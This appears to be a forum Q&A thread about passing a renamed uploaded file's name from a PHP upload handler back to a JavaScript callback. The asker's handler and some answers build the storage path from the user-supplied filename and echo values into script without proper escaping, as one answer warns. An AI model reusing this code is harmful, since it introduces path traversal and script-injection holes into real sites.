document.getElementById('upload_form').innerHTML = result;
document.getElementById('upload_form').style.visibility = 'visible';
return true;
}
And I've got a simple .php file that process uploads with renaming the uploaded files (I named it "process_file.php"), and connects again with upload.js to fetch the result:
<?php
$file_name = $HTTP_POST_FILES['myfile']['name'];
$random_digit = rand(0000,9999);
$new_file_name = $random_digit.$file_name;
$path= "../../../images/home/smsbanner/pixels/".$new_file_name;
if($myfile !=none)
{
if(copy($HTTP_POST_FILES['myfile']['tmp_name'], $path))
{
$result = 1;
}
else
{
$result = 0;
}
}
sleep(1);
?>
<script language="javascript" type="text/javascript">window.top.window.stopUpload(<?php echo $result; ?>);</script>
What I need is inside upload.js to visualize the new name of the uploaded file as an answer if the upload process has been correct? I wrote inside JavaScript code above where exactly I need to put the new name answer.

You have to change your code to the following.
<?php
$file_name = $HTTP_POST_FILES['myfile']['name'];
$random_digit=rand(0000,9999);
$new_file_name=$random_digit.$file_name;
$path= "../../../images/home/smsbanner/pixels/".$new_file_name;
if($myfile !=none)
{
if(copy($HTTP_POST_FILES['myfile']['tmp_name'], $path))
{
$result = 1;
}
else
{
$result = 0;
}
}
sleep(1);
?>
<script language="javascript" type="text/javascript">window.top.window.stopUpload(<?php echo $result; ?>, '<?php echo "message" ?>');</script>
And your JavaScript code,
function stopUpload(success, message){
var result = '';
if (success == 1){
result = '<div class="correct_sms">The file name is '+message+'!</div>';
}
else {
result = '<div class="wrong_sms">There was an error during upload!</div>';
}
document.getElementById('upload_form').innerHTML = result;
document.getElementById('upload_form').style.visibility = 'visible';
return true;
}

RageZ's answer was just about what I was going to post, but to be a little more specific, the last line of your php file should look like this:
<script language="javascript" type="text/javascript">window.top.window.stopUpload(<?php echo $result; ?>, '<?php echo $new_file_name ?>');</script>
The javascript will error without quotes around that second argument and I'm assuming $new_file_name is what you want to pass in. To be safe, you probably even want to escape the file name (I think in this case addslashes will work).

A dumb man once said; "There are no stupid questions, only stupid answers". Though he was wrong; there are in fact loads of stupid questions, but this is not one of them.
Besides that, you are stating that the .js is uploading the file. This isn't really true.
I bet you didn't post all your code.
You can make the PHP and JavaScript work together on this problem by using Ajax, I recommend using the jQuery framework to accomplish this, mostly because it has easy to use functions for Ajax, but also because it has excellent documentation.

How about extending the callback script with:
window.top.window.stopUpload(
<?php echo $result; ?>,
'<?php echo(addslashes($new_file_name)); ?>'
);
(The addslashes and quotes are necessary to make the PHP string come out encoded into a JavaScript string literal.)
Then add a 'filename' parameter to the stopUpload() function and spit it out in the HTML.
$new_file_name=$random_digit.$file_name;
Sorry, that is not sufficient to make a filename safe. $file_name might contain segments like ‘x/../../y’, or various other illegal or inconsistently-supported characters. Filename sanitisation is much harder than it looks; you are better off making up a completely new (random) file name and not relying on user input for it at all.

Categories